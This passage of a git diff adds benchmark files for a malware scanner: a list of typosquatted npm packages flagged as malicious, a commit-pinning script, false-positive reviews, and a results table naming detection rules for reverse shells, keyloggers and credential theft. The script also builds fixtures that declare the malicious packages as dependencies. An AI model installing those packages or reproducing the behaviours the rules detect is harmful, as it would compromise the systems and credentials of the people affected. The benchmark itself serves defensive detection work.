"MAL-2024-8862", "reportBlobSha": "cebceb18d12edabb3bf055a6936a367b0614e792" }, + { "name": "cors-parser", "version": "*", "reportId": "MAL-2024-1377", "reportBlobSha": "c78863fed3a5a3b662b72b05c16b77d9dc153665" }, + { "name": "electorn", "version": "*", "reportId": "MAL-2025-19413", "reportBlobSha": "84b9fce13d64dd7ec790910850e9fbbbf58cf348" }, + { "name": "flatmap-stream", "version": "*", "reportId": "MAL-2025-20690", "reportBlobSha": "2fdd79a99598980c7c4cbaad70833538b602a95c" }, + { "name": "lodahs", "version": "*", "reportId": "MAL-2025-25502", "reportBlobSha": "67e0222164b6b5f6ec72ce58d7a20b430cac4dd2" }, + { "name": "axios.js", "version": "*", "reportId": "MAL-2025-4275", "reportBlobSha": "238dc228cd9cf54efea67c07f9bc7089b15207b4" }, + { "name": "axiosqqq", "version": "1.16.2", "reportId": "MAL-2026-4493", "reportBlobSha": "366383ef9f8518dfc534b911251a2dbe5ccd3928" }, + { "name": "axioss", "version": "*", "reportId": "MAL-2025-15242", "reportBlobSha": "5850d1f4f2806fd59eb535b3e4d45beb058bc826" }, + { "name": "babel-laoder", "version": "*", "reportId": "MAL-2025-15281", "reportBlobSha": "e6a3d9c6a3d214bff2f326a8f1d8ba8ac8c1d472" }, + { "name": "babel-loadre", "version": "*", "reportId": "MAL-2025-15282", "reportBlobSha": "b23f507de17d8c239290fb1c36a5d9a6d886b92c" }, + { "name": "babel-loqder", "version": "*", "reportId": "MAL-2025-15283", "reportBlobSha": "a98eafc3406e034fe14c4e2fe25edc21ee7e9a47" }, + { "name": "babel-node", "version": "*", "reportId": "MAL-2025-15286", "reportBlobSha": "7d72739e67fda4b48cc77bfcb6c868feafd17567" }, + { "name": "babel-pal", "version": "*", "reportId": "MAL-2025-15289", "reportBlobSha": "283dd8d75b91d4a35c89707bd10115e3d2ff9c69" }, + { "name": "axios-http", "version": "*", "reportId": "MAL-2025-15238", "reportBlobSha": "aceadeea25bc4b32b766096204db12a15315e090" }, + { "name": "axios-proxy", "version": "*", "reportId": "MAL-2023-116", "reportBlobSha": "0d58b457e7175cc230bff6d7b6da40d3781a5466" }, + { "name": "axios-browserify", "version": "1.0.0", "reportId": "MAL-2025-4813", "reportBlobSha": "bcd00abcd6ee4bb4083f79b6e4d10b6d289aa392" }, + { "name": "axios-builder", "version": "1.2.1", "reportId": "MAL-2025-190832", "reportBlobSha": "b9b988a111a6e0915333f4b29ce75fb1fe05f293" }, + { "name": "axios-mockadptr", "version": "*", "reportId": "MAL-2024-10692", "reportBlobSha": "79cb12c286a16d2f04288db57a43bce0b197d907" }, + { "name": "axios-cancelable", "version": "1.0.1", "reportId": "MAL-2025-191389", "reportBlobSha": "6bae4d1fc6ab36b3516d10c59910f905e50c4f3a" }, + { "name": "babel-plugin-blocks", "version": "*", "reportId": "MAL-2026-2631", "reportBlobSha": "d20844f3c5e46ef0707cdad324c86ce0b027a8fa" }, + { "name": "babel-ganache", "version": "2.2.4", "reportId": "MAL-2025-47613", "reportBlobSha": "3075fa3df8d2b7a89c816127adda2b9188415350" }, + { "name": "babel-js", "version": "1.0.1", "reportId": "MAL-2026-407", "reportBlobSha": "6bbba35a96333e1960acec15928b07c83544e48a" }, + { "name": "babel-npm-install", "version": "*", "reportId": "MAL-2025-15287", "reportBlobSha": "910018e9ea790fae8a6c9141550913cf26e5275d" }, + { "name": "babel-npm-publish", "version": "*", "reportId": "MAL-2025-15288", "reportBlobSha": "4a51f824f7203deffb5fd237dc4105ebfbfeba03" }, + { "name": "babel-loader-fs", "version": "*", "reportId": "MAL-2025-3985", "reportBlobSha": "eb426f1379301192517dbb30aad8a7b4e6993343" } + ] +} diff --git a/benchmark/pin-corpus.mjs b/benchmark/pin-corpus.mjs new file mode 100644 index 0000000..abfd0af --- /dev/null +++ b/benchmark/pin-corpus.mjs @@ -0,0 +1,141 @@ +import { createHash } from "node:crypto" +import { execFileSync } from "node:child_process" +import { readFile, writeFile } from "node:fs/promises" +import { dirname, join } from "node:path" +import { fileURLToPath } from "node:url" + +const benchmarkDir = dirname(fileURLToPath(import.meta.url)) +const sourcePath = join(benchmarkDir, "corpus.json") +const outputPath = join(benchmarkDir, "corpus.lock.json") +const refresh = process.argv.includes("--refresh") +function resolveGithubToken() { + if (process.env.FLAGRIX_GITHUB_TOKEN) return process.env.FLAGRIX_GITHUB_TOKEN + try { + return execFileSync("gh", ["auth", "token"], { encoding: "utf8", stdio: ["ignore", "pipe", "ignore"] }).trim() || undefined + } catch { + return undefined + } +} + +const token = resolveGithubToken() + +function headers() { + const value = { + Accept: "application/vnd.github+json", + "User-Agent": "Flagrix-Benchmark", + "X-GitHub-Api-Version": "2022-11-28", + } + if (token) value.Authorization = `Bearer ${token}` + return value +} + +async function githubJson(url) { + const response = await fetch(url, { headers: headers() }) + if (!response.ok) { + const remaining = response.headers.get("x-ratelimit-remaining") + const reset = response.headers.get("x-ratelimit-reset") + throw new Error( + `GitHub ${response.status} for ${url} (remaining=${remaining ?? "?"}, reset=${reset ?? "?"})` + ) + } + return response.json() +} + +async function resolveHead(repo) { + const metadata = await githubJson(`https://api.github.com/repos/${repo}`) + const commit = await githubJson( + `https://api.github.com/repos/${repo}/commits/${encodeURIComponent(metadata.default_branch)}` + ) + if (!/^[0-9a-f]{40}$/i.test(commit.sha)) throw new Error(`Invalid commit SHA for ${repo}`) + return { sha: commit.sha, defaultBranch: metadata.default_branch } +} + +async function main() { + let previousByRepo = new Map() + if (!refresh) { + try { + const previous = JSON.parse(await readFile(outputPath, "utf8")) + previousByRepo = new Map(previous.samples + .filter((sample) => sample.target.kind === "github") + .map((sample) => [sample.target.repo, sample])) + } catch { + // No lock exists yet. + } + } + const sourceText = await readFile(sourcePath, "utf8") + const corpus = JSON.parse(sourceText) + const additionsText = await readFile(join(benchmarkDir, "github-projects.json"), "utf8") + const additions = JSON.parse(additionsText) + const osvText = await readFile(join(benchmarkDir, "osv-malicious-packages.json"), "utf8") + const osv = JSON.parse(osvText) + corpus.samples.push(...additions.projects.map((project) => { + const prefix = project.corpus === "noisy-legitimate" ? "noisy" : "reference" + const slug = project.repo.toLowerCase().replaceAll("/", "-").replaceAll(".", "-") + return { + sampleId: `${prefix}-${slug}`, + corpus: project.corpus, + label: "reference-clean", + labelSource: "Expanded commit-pinned reference corpus", + sourceUrl: `https://github.com/${project.repo}`, + immutableRef: null, + maximumExpectedVerdict: "low", + expectedDetectionCategories: [], + target: { kind: "github", repo: project.repo, ref: null }, + } + })) + corpus.samples.push(...osv.packages.map((entry) => osvSample(osv.source, entry))) + for (const sample of corpus.samples) { + if (sample.target.kind !== "github") continue + if (/^[0-9a-f]{40}$/i.test(sample.target.ref ?? "")) continue + const previous = previousByRepo.get(sample.target.repo) + if (/^[0-9a-f]{40}$/i.test(previous?.target.ref ?? "")) { + sample.target.ref = previous.target.ref + sample.immutableRef = previous.immutableRef + sample.defaultBranchAtPin = previous.defaultBranchAtPin + console.error(`preserved ${sample.target.repo}@${sample.target.ref.slice(0, 12)}`) + continue + } + const pinned = await resolveHead(sample.target.repo) + sample.target.ref = pinned.sha + sample.immutableRef = pinned.sha + sample.defaultBranchAtPin = pinned.defaultBranch + console.error(`pinned ${sample.target.repo}@${pinned.sha.slice(0, 12)}`) + } + corpus.pinnedAt = new Date().toISOString() + corpus.sourceCorpusSha256 = createHash("sha256") + .update(sourceText) + .update(additionsText) + .update(osvText) + .digest("hex") + await writeFile(outputPath, JSON.stringify(corpus, null, 2) + "\n") + console.log(outputPath) +} + +function osvSample(source, entry) { + const reportPath = `osv/malicious/${source.ecosystem}/${entry.name}/${entry.reportId}.json` + return { + sampleId: `malicious-osv-${entry.reportId.toLowerCase()}`, + corpus: "real-malicious", + label: "known-malicious-metadata", + labelSource: `OpenSSF OSV ${entry.reportId}; report blob ${entry.reportBlobSha}`, + sourceUrl: `https://github.com/${source.repository}/blob/${source.commit}/${reportPath}`, + immutableRef: `osv:${source.commit}:${entry.reportBlobSha}`, + expectedDetectionCategories: ["SUSPICIOUS_DEPENDENCY"], + minimumExpectedVerdict: "high", + target: { + kind: "fixture", + files: { + "package.json": JSON.stringify({ + name: `flagrix-inert-${entry.reportId.toLowerCase()}`, + private: true, + dependencies: { [entry.name]: entry.version }, + }) + "\n", + }, + }, + } +} + +main().catch((error) => { + console.error(`benchmark:pin: ${error instanceof Error ? error.message : error}`) + process.exitCode = 1 +}) diff --git a/benchmark/reference-review.json b/benchmark/reference-review.json new file mode 100644 index 0000000..f0ed1dd --- /dev/null +++ b/benchmark/reference-review.json @@ -0,0 +1,36 @@ +{ + "reviewedAt": "2026-07-13T12:20:00Z", + "method": "Manual source review of every High/Critical pre-fix finding at the immutable commit recorded in pre-fix-baseline.json.", + "reviews": { + "reference-fixture-event-stream-safe-version-v1": "False positive: event-stream 4.0.1 is outside the signature's affected 3.3.6 version.", + "reference-express": "False positive: eval occurs in root-level test code, not a hidden runtime payload.", + "reference-axios": "False positives: an alternation bug made bare axios.post match BEAVERTAIL_EXFIL; remaining cookie, FormData, and IP uses are normal HTTP-client behavior and tests.", + "reference-lodash": "False positives: vendored/minified libraries, documented dynamic execution, and numeric text were counted as independent malware signals.", + "reference-react": "False positive: numeric SVG/icon content was interpreted as a hardcoded public IP.", + "reference-vue": "False positives: compiler expression validation intentionally uses Function construction; no obfuscated payload or exfiltration sink is present.", + "reference-next": "False positives: generated GitHub Action bundles and mixed-case encoded text triggered eval, long-line, AWS-key, cookie, and file heuristics; the socket is a connectivity check without a shell process.", + "noisy-vscode": "False positives: macOS code-signing legitimately queries Keychain credentials and pipeline code contains ordinary literal IP data.", + "noisy-playwright": "False positives: browser automation intentionally exposes eval/clipboard APIs and includes generated image/path data; no covert payload or exfiltration context is present.", + "noisy-esbuild": "False positive: installer code writes its own binary into an installation directory; it is not an arbitrary system-directory write.", + "noisy-node": "False positives: dynamic execution appears in explicit benchmark sources, not shipped application behavior.", + "reference-hapijs-hapi": "False positives: socket and literal-IP matches occur in root-level tests without shell execution or a command channel.", + "reference-date-fns-date-fns": "False positives: CDN examples intentionally exercise eval; repeated examples are one low-confidence behavior family.", + "reference-ramda-ramda": "False positive: the published minified distribution is generated build output, not concealed source malware.", + "reference-sindresorhus-got": "False positives: socket, IP, and password-shaped values occur in root-level network tests and fixtures.", + "reference-socketio-socket-io": "False positives: hardcoded comparisons and credentials are explicitly labeled runnable examples, not an authentication backdoor in the library.", + "reference-tanstack-query": "False positive: the Algolia example uses a public search-only API key; generic key shape alone does not establish a secret.", + "reference-prisma-prisma": "False positives: CLI generation and initialization examples intentionally contain dynamic execution and sample database URLs.", + "reference-prettier-prettier": "False positives: Function construction is part of CLI/config/build transformation tooling, not hidden runtime code.", + "reference-pnpm-pnpm": "False positive: the login command contains password-handling UI text/values, not a committed production credential.", + "noisy-denoland-deno": "False positives: generated documentation assets, TypeScript declarations, workflow examples, and literal network documentation were over-weighted.", + "noisy-oven-sh-bun": "False positives: benchmark snippets and generated worker bundles intentionally contain dynamic/cryptographic test data.", + "noisy-tauri-apps-tauri": "False positives: a generated global bundle and normal API credential terminology were treated as concealed code and a hardcoded password.", + "noisy-puppeteer-puppeteer": "False positives: browser automation APIs deliberately support eval, clipboard reads, and string timers; access alone is not exfiltration.", + "noisy-microsoft-typescript": "False positives: compiler Unicode tables, harness eval/Function support, and numeric source constants were counted as malware signals.", + "noisy-npm-cli": "False positives: profile/auth/login source handles password values but does not embed a deployable credential.", + "noisy-homebrew-brew": "False positives: .shellcheckrc matched a hidden-file substring and installer source mentioned security controls outside README instructions.", + "noisy-python-cpython": "False positives: generated profiling visualizations, documentation assets, console escape tables, and platform constants are legitimate interpreter sources.", + "noisy-ansible-ansible": "False positives: PowerShell paths, CLI password handling, and protocol constants were classified by substrings without malicious context.", + "noisy-rust-lang-rust": "False positive: CI SDK download/network constants are ordinary build infrastructure, not covert network communication." + } +} diff --git a/benchmark/results/post-fix-final.csv b/benchmark/results/post-fix-final.csv new file mode 100644 index 0000000..f759237 --- /dev/null +++ b/benchmark/results/post-fix-final.csv @@ -0,0 +1,91 @@ +"sample_id","corpus","label","label_source","source_url","immutable_ref","expected_detection_category","minimum_expected_verdict","maximum_expected_verdict","status","test_passed","category_detected","verdict_pass","actual_verdict","actual_score","safe_to_clone","rules_triggered","finding_severities","finding_confidences","false_positive_notes","files_scanned","files_skipped","tree_truncated","duration_ms","engine_version","engine_commit_sha","detection_rules_version","detection_rules_commit_sha","error" +"critical-keylogger-exfil-v1","critical-fixture","known-malicious-structure","Flagrix claimed behavior: keyboard capture plus network sink","https://github.com/flagrix-io/flagrix-detection-rules","fixture-v1:47ddfcaf4652dcead3194f3be5f4bdc8e1b43742","EXFIL_KEYLOGGER","high","","completed","true","true","true","high","0.4","false","EXFIL_KEYLOGGER","critical","high","","1","0","false","41","0.2.2","8c56989d719efb88051d0ac4d319abcdf63649fe","2026.07.12.002","193cd4906826ed458976c1f7b9b56bacc09019dd","" +"critical-beavertail-loader-v1","critical-fixture","known-malicious-structure","Flagrix claimed Lazarus BeaverTail loader structure","https://github.com/flagrix-io/flagrix-detection-rules","fixture-v1:cd28e14b93bd48d8fc52714787299569897f6408","BEAVERTAIL_LOADER_V1","high","","completed","true","true","true","high","0.4","false","BEAVERTAIL_LOADER_V1","critical","high","","1","0","false","3","0.2.2","8c56989d719efb88051d0ac4d319abcdf63649fe","2026.07.12.002","193cd4906826ed458976c1f7b9b56bacc09019dd","" +"critical-env-exfil-v1","critical-fixture","known-malicious-structure","Flagrix claimed environment-variable exfiltration structure","https://github.com/flagrix-io/flagrix-detection-rules","fixture-v1:11214d0e6bf271f10d443bf17c16d83232e2f297","BEAVERTAIL_EXFIL","high","","completed","true","true","true","high","0.4","false","BEAVERTAIL_EXFIL","critical","high","","1","0","false","2","0.2.2","8c56989d719efb88051d0ac4d319abcdf63649fe","2026.07.12.002","193cd4906826ed458976c1f7b9b56bacc09019dd","" +"critical-reverse-shell-v1","critical-fixture","known-malicious-structure","Flagrix claimed reverse-shell socket structure","https://github.com/flagrix-io/flagrix-detection-rules","fixture-v1:feff0e223beffb7e78b88ad496ff6f96c1871028","REVERSE_SHELL","high","","completed","true","true","true","high","0.4","false","REVERSE_SHELL","critical","high","","1","0","false","1","0.2.2","8c56989d719efb88051d0ac4d319abcdf63649fe","2026.07.12.002","193cd4906826ed458976c1f7b9b56bacc09019dd","" +"critical-crypto-miner-v1","critical-fixture","known-malicious-structure","Flagrix claimed cryptocurrency-miner endpoint structure","https://github.com/flagrix-io/flagrix-detection-rules","fixture-v1:09955ea0b3c26412934cd61e99cc25a921f8c943","CRYPTO_MINER","high","","completed","true","true","true","high","0.4","false","CRYPTO_MINER","critical","high","","1","0","false","1","0.2.2","8c56989d719efb88051d0ac4d319abcdf63649fe","2026.07.12.002","193cd4906826ed458976c1f7b9b56bacc09019dd","" +"critical-obfuscated-eval-v1","critical-fixture","known-malicious-structure","Flagrix claimed Base64-decoded dynamic execution structure","https://github.com/flagrix-io/flagrix-detection-rules","fixture-v1:3f60ed22624352d562b694600d87f7a37bf81fe3","OBFUSCATED_EVAL","medium","","completed","true","true","true","high","0.4375","false","OBFUSCATED_EVAL | OBF_EVAL","critical | medium","high | low","","1","0","false","1","0.2.2","8c56989d719efb88051d0ac4d319abcdf63649fe","2026.07.12.002","193cd4906826ed458976c1f7b9b56bacc09019dd","" +"critical-rce-endpoint-v1","critical-fixture","known-malicious-structure","Flagrix claimed request-driven remote-code-execution structure","https://github.com/flagrix-io/flagrix-detection-rules","fixture-v1:e4084292f92b05d88db1c0b433a74ab63e8ff3ca","BACKDOOR_RCE_ENDPOINT","high","","completed","true","true","true","high","0.4375","false","BACKDOOR_RCE_ENDPOINT | OBF_EVAL","critical | medium","high | low","","1","0","false","0","0.2.2","8c56989d719efb88051d0ac4d319abcdf63649fe","2026.07.12.002","193cd4906826ed458976c1f7b9b56bacc09019dd","" +"critical-credential-file-read-v1","critical-fixture","known-malicious-structure","Flagrix claimed credential-file access structure","https://github.com/flagrix-io/flagrix-detection-rules","fixture-v1:895568b6b685834b3d6cf7186308ccc7f23f3cbe","FILE_ACCESS_CREDENTIALS","high","","completed","true","true","true","high","0.4","false","FILE_ACCESS_CREDENTIALS","critical","high","","1","0","false","0","0.2.2","8c56989d719efb88051d0ac4d319abcdf63649fe","2026.07.12.002","193cd4906826ed458976c1f7b9b56bacc09019dd","" +"critical-aws-key-v1","critical-fixture","known-malicious-structure","Flagrix claimed AWS access-key pattern using a reserved dummy value","https://docs.aws.amazon.com/IAM/latest/UserGuide/reference_identifiers.html","fixture-v1:ab32de596974e481f402ba256ae69b9cf9ce9e76","HARDCODED_AWS_KEY","high","","completed","true","true","true","high","0.4","false","HARDCODED_AWS_KEY","critical","high","","1","0","false","1","0.2.2","8c56989d719efb88051d0ac4d319abcdf63649fe","2026.07.12.002","193cd4906826ed458976c1f7b9b56bacc09019dd","" +"critical-install-script-v1","critical-fixture","known-malicious-structure","Flagrix claimed install-time download and dynamic execution structure","https://github.com/flagrix-io/flagrix-scanner-core","fixture-v1:611f7347091fa4506e2f4ef8884a30fd011f7314","POSTINSTALL_SCRIPT","high","","completed","true","true","true","high","0.4","false","POSTINSTALL_SCRIPT","high | critical","unspecified | unspecified","","1","0","false","1","0.2.2","8c56989d719efb88051d0ac4d319abcdf63649fe","2026.07.12.002","193cd4906826ed458976c1f7b9b56bacc09019dd","" +"reference-fixture-keyboard-shortcut-v1","reference-fixture","reference-clean","Regression control for ordinary keyboard UI handling","https://github.com/flagrix-io/flagrix-scanner-core","fixture-v1:0ffca52988c432109773a57e23c338551b9c51b8","","","low","completed","true","true","true","low","0","true","","","","","1","0","false","1","0.2.2","8c56989d719efb88051d0ac4d319abcdf63649fe","2026.07.12.002","193cd4906826ed458976c1f7b9b56bacc09019dd","" +"reference-fixture-placeholder-secret-v1","reference-fixture","reference-clean","Regression control for documented placeholder configuration","https://github.com/9valleb9/SPY-Options-Dashboard","fixture-v1:d55f3f65c602eb1f695a587f61db7d635bfa1ad7","","","low","completed","true","true","true","low","0.05","true","HARDCODED_API_KEY","low","high","","1","0","false","1","0.2.2","8c56989d719efb88051d0ac4d319abcdf63649fe","2026.07.12.002","193cd4906826ed458976c1f7b9b56bacc09019dd","" +"reference-fixture-flask-debug-v1","reference-fixture","reference-clean","Regression control: deployment warning must not be labeled a backdoor","https://github.com/9valleb9/SPY-Options-Dashboard","fixture-v1:18c530bc5c541ea2a330c43493279fc8e9686e26","","","low","completed","true","true","true","low","0.05","true","INSECURE_CONFIGURATION","low","high","","1","0","false","0","0.2.2","8c56989d719efb88051d0ac4d319abcdf63649fe","2026.07.12.002","193cd4906826ed458976c1f7b9b56bacc09019dd","" +"reference-fixture-detector-regex-v1","reference-fixture","reference-clean","Regression control for security tools containing inert detector regexes","https://github.com/flagrix-io/flagrix-scanner-core","fixture-v1:977043432c1a3f3ec5c5914bcdbb96c33c6e8995","","","low","completed","true","true","true","low","0","true","","","","","1","0","false","0","0.2.2","8c56989d719efb88051d0ac4d319abcdf63649fe","2026.07.12.002","193cd4906826ed458976c1f7b9b56bacc09019dd","" +"reference-fixture-event-stream-safe-version-v1","reference-fixture","reference-clean","Version-bound negative control for the compromised event-stream 3.3.6 incident","https://github.com/dominictarr/event-stream","package:event-stream@4.0.1:4989205f2c15c653baf5fd41bbacb8a7f6d55bad","","","low","completed","true","true","true","low","0","true","","","","","1","0","false","0","0.2.2","8c56989d719efb88051d0ac4d319abcdf63649fe","2026.07.12.002","193cd4906826ed458976c1f7b9b56bacc09019dd","" +"reference-express","reference-clean","reference-clean","User-provided normal-project starter set","https://github.com/expressjs/express","ae6dd37680e3a00618d6c8a3e522f0ee4eeba1a4","","","low","completed","true","true","true","low","0","true","","","","","151","62","false","2991","0.2.2","8c56989d719efb88051d0ac4d319abcdf63649fe","2026.07.12.002","193cd4906826ed458976c1f7b9b56bacc09019dd","" +"reference-fastify","reference-clean","reference-clean","User-provided normal-project starter set","https://github.com/fastify/fastify","de3752df84bb8dd35a8226bb467f05862f4da57c","","","low","completed","true","true","true","low","0.075","true","OBF_BASE64_HEAVY | DATA_EXFILTRATION","medium | medium","low | low","","200","193","false","3042","0.2.2","8c56989d719efb88051d0ac4d319abcdf63649fe","2026.07.12.002","193cd4906826ed458976c1f7b9b56bacc09019dd","" +"reference-koa","reference-clean","reference-clean","User-provided normal-project starter set","https://github.com/koajs/koa","52d5e8ff5ac79f2479463b53df2999900ae95115","","","low","completed","true","true","true","low","0","true","","","","","84","27","false","2215","0.2.2","8c56989d719efb88051d0ac4d319abcdf63649fe","2026.07.12.002","193cd4906826ed458976c1f7b9b56bacc09019dd","" +"reference-axios","reference-clean","reference-clean","User-provided normal-project starter set","https://github.com/axios/axios","3ebc76240c835a07fc6af23cb10d41579371a08f","","","low","completed","true","true","true","low","0.165","true","EXFIL_COOKIE | DATA_EXFILTRATION | NETWORK_COMMUNICATION","medium | medium | medium","medium | low | low","","200","254","false","4852","0.2.2","8c56989d719efb88051d0ac4d319abcdf63649fe","2026.07.12.002","193cd4906826ed458976c1f7b9b56bacc09019dd","" +"reference-lodash","reference-clean","reference-clean","User-provided normal-project starter set","https://github.com/lodash/lodash","a666ba591064c8011988275790ad7d625279f09c","","","low","completed","true","true","true","low","0.2025","true","OBF_HEX_STRINGS | EXFIL_COOKIE | OBF_BASE64_HEAVY | OBF_EVAL | OBF_NEW_FUNCTION | OBFUSCATED_CODE | NETWORK_COMMUNICATION | DATA_EXFILTRATION","medium | medium | medium | medium | medium | medium | medium | medium | medium | medium | medium | medium | medium | medium | medium","low | low | low | medium | low | low | low | low | low | low | low | low | low | low | low","","63","97","false","5500","0.2.2","8c56989d719efb88051d0ac4d319abcdf63649fe","2026.07.12.002","193cd4906826ed458976c1f7b9b56bacc09019dd","" +"reference-chalk","reference-clean","reference-clean","User-provided normal-project starter set","https://github.com/chalk/chalk","aa06bb5ac3f14df9fda8cfb54274dfc165ddfdef","","","low","completed","true","true","true","low","0.15","true","TYPOSQUAT_PACKAGE","medium","unspecified","","21","13","false","2281","0.2.2","8c56989d719efb88051d0ac4d319abcdf63649fe","2026.07.12.002","193cd4906826ed458976c1f7b9b56bacc09019dd","" +"reference-uuid","reference-clean","reference-clean","User-provided normal-project starter set","https://github.com/uuidjs/uuid","ea83515d6a4de13a8f9d253fe772752c9dd7bbbe","","","low","completed","true","true","true","low","0.09","true","SUSPICIOUS_FILE_ACCESS","medium","medium","","100","34","false","2424","0.2.2","8c56989d719efb88051d0ac4d319abcdf63649fe","2026.07.12.002","193cd4906826ed458976c1f7b9b56bacc09019dd","" +"reference-node-fetch","reference-clean","reference-clean","User-provided normal-project starter set","https://github.com/node-fetch/node-fetch","8b3320d2a7c07bce4afc6b2bf6c3bbddda85b01f","","","low","completed","true","true","true","low","0","true","","","","","27","26","false","1942","0.2.2","8c56989d719efb88051d0ac4d319abcdf63649fe","2026.07.12.002","193cd4906826ed458976c1f7b9b56bacc09019dd","" +"reference-react","reference-clean","reference-clean","User-provided normal-project starter set","https://github.com/facebook/react","c0c39a6b3907eaab35f43074949e2957a2a734c1","","","low","completed","true","true","true","low","0.0375","true","NETWORK_COMMUNICATION","medium","low","","200","7070","false","4591","0.2.2","8c56989d719efb88051d0ac4d319abcdf63649fe","2026.07.12.002","193cd4906826ed458976c1f7b9b56bacc09019dd","" +"reference-vue","reference-clean","reference-clean","User-provided normal-project starter set","https://github.com/vuejs/core","9e03beb6b4c85a9d5b49b731c08263aa648e2a2a","","","low","completed","true","true","true","low","0.0375","true","OBF_NEW_FUNCTION","medium | medium | medium","low | low | low","","200","503","false","2954","0.2.2","8c56989d719efb88051d0ac4d319abcdf63649fe","2026.07.12.002","193cd4906826ed458976c1f7b9b56bacc09019dd","" +"reference-svelte","reference-clean","reference-clean","User-provided normal-project starter set","https://github.com/sveltejs/svelte","b4d1583ae20f3869a88a731d9a265c546c099f66","","","low","completed","true","true","true","low","0","true","","","","","200","8765","false","3229","0.2.2","8c56989d719efb88051d0ac4d319abcdf63649fe","2026.07.12.002","193cd4906826ed458976c1f7b9b56bacc09019dd","" +"reference-vite","reference-clean","reference-clean","User-provided normal-project starter set","https://github.com/vitejs/vite","fef682d3f067d534a559faf6fd9baedda2e9f8f1","","","low","completed","true","true","true","low","0","true","","","","","200","2513","false","3436","0.2.2","8c56989d719efb88051d0ac4d319abcdf63649fe","2026.07.12.002","193cd4906826ed458976c1f7b9b56bacc09019dd","" +"reference-next","reference-clean","reference-clean","User-provided normal-project starter set","https://github.com/vercel/next.js","93249ee06d6e0c105b1278412768c8e0816d9936","","","low","completed","true","true","true","low","0.27","true","OBF_BASE64_HEAVY | OBF_EVAL | OBFUSCATED_CODE | EXFIL_COOKIE | SUSPICIOUS_FILE_ACCESS | CODE_INTEGRITY_ISSUE","medium | medium | medium | medium | medium | medium | medium | medium | medium | medium | medium | medium | medium | medium | medium | medium | medium | medium | medium | medium | medium | medium","low | low | medium | medium | low | low | medium | medium | low | low | medium | low | medium | low | medium | low | medium | medium | medium | medium | low | low","","200","29628","false","10275","0.2.2","8c56989d719efb88051d0ac4d319abcdf63649fe","2026.07.12.002","193cd4906826ed458976c1f7b9b56bacc09019dd","" +"reference-nest","reference-clean","reference-clean","User-provided normal-project starter set","https://github.com/nestjs/nest","f2938487c45db149964a8b0efc58a073610dcdf1","","","low","completed","true","true","true","low","0","true","","","","","200","1928","false","3363","0.2.2","8c56989d719efb88051d0ac4d319abcdf63649fe","2026.07.12.002","193cd4906826ed458976c1f7b9b56bacc09019dd","" +"noisy-vscode","noisy-legitimate","reference-clean","User-provided scanner-hostile starter set","https://github.com/microsoft/vscode","af2c64423e7ee5d1030a000c82a0bb774d043351","","","low","completed","true","true","true","low","0.2625","true","OBF_BASE64_HEAVY | CREDENTIAL_THEFT | NETWORK_COMMUNICATION | DATA_EXFILTRATION","medium | high | medium | medium | medium | medium | medium | medium","low | medium | low | low | low | low | low | low","Manual review required; this result is not yet classified as a false positive.","200","16247","false","4734","0.2.2","8c56989d719efb88051d0ac4d319abcdf63649fe","2026.07.12.002","193cd4906826ed458976c1f7b9b56bacc09019dd","" +"noisy-playwright","noisy-legitimate","reference-clean","User-provided scanner-hostile starter set","https://github.com/microsoft/playwright","2670e5cae0239502d053e530da2c675e5aa536aa","","","low","completed","true","true","true","low","0.11249999999999999","true","OBF_BASE64_HEAVY | OBFUSCATED_CODE | OBF_EVAL | DATA_EXFILTRATION | NETWORK_COMMUNICATION","medium | medium | medium | medium | medium | medium | medium | medium | medium","low | low | low | low | low | low | low | low | low","","200","3047","false","3609","0.2.2","8c56989d719efb88051d0ac4d319abcdf63649fe","2026.07.12.002","193cd4906826ed458976c1f7b9b56bacc09019dd","" +"noisy-cypress","noisy-legitimate","reference-clean","User-provided scanner-hostile starter set","https://github.com/cypress-io/cypress","cd8bb88f1080d0ee354e605fadba986b03320828","","","low","completed","true","true","true","low","0.15","true","TYPOSQUAT_PACKAGE","medium","unspecified","","200","6980","false","4145","0.2.2","8c56989d719efb88051d0ac4d319abcdf63649fe","2026.07.12.002","193cd4906826ed458976c1f7b9b56bacc09019dd","" +"noisy-electron","noisy-legitimate","reference-clean","User-provided scanner-hostile starter set","https://github.com/electron/electron","8215b5aa536ec6ae121003bc618bdd825bdbbb0f","","","low","completed","true","true","true","low","0.0375","true","DATA_EXFILTRATION","medium | medium | medium","low | low | low","","200","2849","false","3442","0.2.2","8c56989d719efb88051d0ac4d319abcdf63649fe","2026.07.12.002","193cd4906826ed458976c1f7b9b56bacc09019dd","" +"noisy-esbuild","noisy-legitimate","reference-clean","User-provided scanner-hostile starter set","https://github.com/evanw/esbuild","6ff1d8b0d8c134e867a397eef39702a223ebef9e","","","low","completed","true","true","true","low","0.1275","true","SUSPICIOUS_FILE_ACCESS | DATA_EXFILTRATION","medium | medium","medium | low","","200","149","false","3536","0.2.2","8c56989d719efb88051d0ac4d319abcdf63649fe","2026.07.12.002","193cd4906826ed458976c1f7b9b56bacc09019dd","" +"noisy-node","noisy-legitimate","reference-clean","User-provided scanner-hostile starter set","https://github.com/nodejs/node","1314579f8c82ed70b8cbe736fdea1df48624c285","","","low","completed","true","true","true","low","0","true","","","","","200","49533","false","4251","0.2.2","8c56989d719efb88051d0ac4d319abcdf63649fe","2026.07.12.002","193cd4906826ed458976c1f7b9b56bacc09019dd","" +"reference-hapijs-hapi","reference-clean","reference-clean","Expanded commit-pinned reference corpus","https://github.com/hapijs/hapi","d4f93d80e6acadb0000f1cf67f9b1b5992e8a8cc","","","low","completed","true","true","true","low","0","true","","","","","62","12","false","2921","0.2.2","8c56989d719efb88051d0ac4d319abcdf63649fe","2026.07.12.002","193cd4906826ed458976c1f7b9b56bacc09019dd","" +"reference-reduxjs-redux","reference-clean","reference-clean","Expanded commit-pinned reference corpus","https://github.com/reduxjs/redux","5d65348e26635b6ec627b1030732ed38797e88e9","","","low","completed","true","true","true","low","0.1875","true","NETWORK_URL_SHORTENER | DATA_EXFILTRATION","medium | medium | medium | medium | medium","high | high | low | low | low","","200","276","false","3840","0.2.2","8c56989d719efb88051d0ac4d319abcdf63649fe","2026.07.12.002","193cd4906826ed458976c1f7b9b56bacc09019dd","" +"reference-reduxjs-redux-toolkit","reference-clean","reference-clean","Expanded commit-pinned reference corpus","https://github.com/reduxjs/redux-toolkit","7b269256424e1d44baf83d7de634d9f53931dda7","","","low","completed","true","true","true","low","0","true","","","","","200","952","false","2662","0.2.2","8c56989d719efb88051d0ac4d319abcdf63649fe","2026.07.12.002","193cd4906826ed458976c1f7b9b56bacc09019dd","" +"reference-immerjs-immer","reference-clean","reference-clean","Expanded commit-pinned reference 